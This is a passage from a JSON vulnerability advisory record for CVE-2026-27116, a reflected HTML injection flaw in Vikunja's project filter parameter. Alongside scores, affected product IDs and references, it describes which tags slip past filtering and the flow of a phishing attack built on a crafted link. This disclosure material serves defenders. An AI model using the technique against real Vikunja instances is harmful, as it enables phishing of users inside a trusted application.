                    "text": "[Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.\n\n**Attack flow:** Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks \"Filter\" (standard UI action) → phishing content renders inside trusted Vikunja interface.",
                    "title": "gitlab - https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fcode.vikunja.io%2Fapi%2FCVE-2026-27116.yml/raw"
                },
                {
                    "category": "other",
                    "text": "0.0001",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to CWE-116 (Improper Encoding or Escaping of Output)",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5712844",
                    "CSAFPID-5597060",
                    "CSAFPID-5602633",
                    "CSAFPID-5602634",
                    "CSAFPID-5602635",
                    "CSAFPID-5602636",
                    "CSAFPID-5602637",
                    "CSAFPID-5602638",
                    "CSAFPID-5602639",
                    "CSAFPID-5602640",
                    "CSAFPID-5602641",
                    "CSAFPID-5602642",
                    "CSAFPID-5602643",
                    "CSAFPID-5602644",
                    "CSAFPID-5602645",
                    "CSAFPID-5602646",
                    "CSAFPID-5602647",
                    "CSAFPID-5602648",
                    "CSAFPID-5602649",
                    "CSAFPID-5602650",
                    "CSAFPID-5602651",
                    "CSAFPID-5602652",
                    "CSAFPID-5602653",
                    "CSAFPID-5602654",
                    "CSAFPID-5602655",
                    "CSAFPID-5602656",
                    "CSAFPID-5602657",
                    "CSAFPID-5602658",
                    "CSAFPID-5602659",
                    "CSAFPID-5602660",
                    "CSAFPID-5602661",
                    "CSAFPID-5602662",
                    "CSAFPID-5602663",
                    "CSAFPID-5602664",
                    "CSAFPID-5602665",
                    "CSAFPID-5602666",
                    "CSAFPID-5602667",
                    "CSAFPID-5602668",
                    "CSAFPID-5602669",
                    "CSAFPID-5602670",
                    "CSAFPID-5602671",
                    "CSAFPID-5602672",
                    "CSAFPID-5602673",
                    "CSAFPID-5727729",
                    "CSAFPID-5763289",
                    "CSAFPID-5847612"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27116"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27116.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27116"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27116"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-4qgr-4h56-8895.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27116.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27116"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4552.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - gitlab",
                    "url": "https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fcode.vikunja.io%2Fapi%2FCVE-2026-27116.yml/raw"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv",
                    "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv",
                    "url": "https://vikunja.io/changelog/vikunja-v2.0.0-was-released"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; gitlab; osv",
                    "url": "https://github.com/go-vikunja/vikunja/commit/a42b4f37bde58596a3b69482cd5a67641a94f62d"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; gitlab; osv",
                    "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; gitlab; osv",
                    "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; gitlab",
                    "url": "https://github.com/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/27xxx/CVE-2026-27116.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; gitlab; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27116"
                },
                {
                    "category": "external",
                    "summary": "Reference - gitlab",
                    "url": "https://github.com/go-vikunja/vikunja"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                        "baseScore": 6.1,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-5597060",
                        "CSAFPID-5602633",
                        "CSAFPID-5602634",
                        "CSAFPID-5602635",
                        "CSAFPID-5602636",
                        "CSAFPID-5602637",
                        "CSAFPID-5602638",
                        "CSAFPID-5602639",
                        "CSAFPID-5602640",
                        "CSAFPID-5602641",
                        "CSAFPID-5602642",
                        "CSAFPID-5602643",
                        "CSAFPID-5602644",
                        "CSAFPID-5602645",
                        "CSAFPID-5602646",
                        "CSAFPID-5602647",
                        "CSAFPID-5602648",
                        "CSAFPID-5602649",
                        "CSAFPID-5602650",
                        "CSAFPID-5602651",
                        "CSAFPID-5602652",
                        "CSAFPID-5602653",
                        "CSAFPID-5602654",
                        "CSAFPID-5602655",
                        "CSAFPID-5602656",
                        "CSAFPID-5602657",
                        "CSAFPID-5602658",
                        "CSAFPID-5602659",
                        "CSAFPID-5602660",
                        "CSAFPID-5602661",
                        "CSAFPID-5602662",
                        "CSAFPID-5602663",
                        "CSAFPID-5602664",
                        "CSAFPID-5602665",
                        "CSAFPID-5602666",
                        "CSAFPID-5602667",
                        "CSAFPID-5602668",
                        "CSAFPID-5602669",
                        "CSAFPID-5602670",
                        "CSAFPID-5602671",
                        "CSAFPID-5602672",
                        "CSAFPID-5602673",
                        "CSAFPID-5712844",
                        "CSAFPID-5727729",
                        "CSAFPID-5763289",
                        "CSAFPID-5847612"
                    ]
                }
            ],
            "title": "CVE-2026-27116"
        }
    ]
}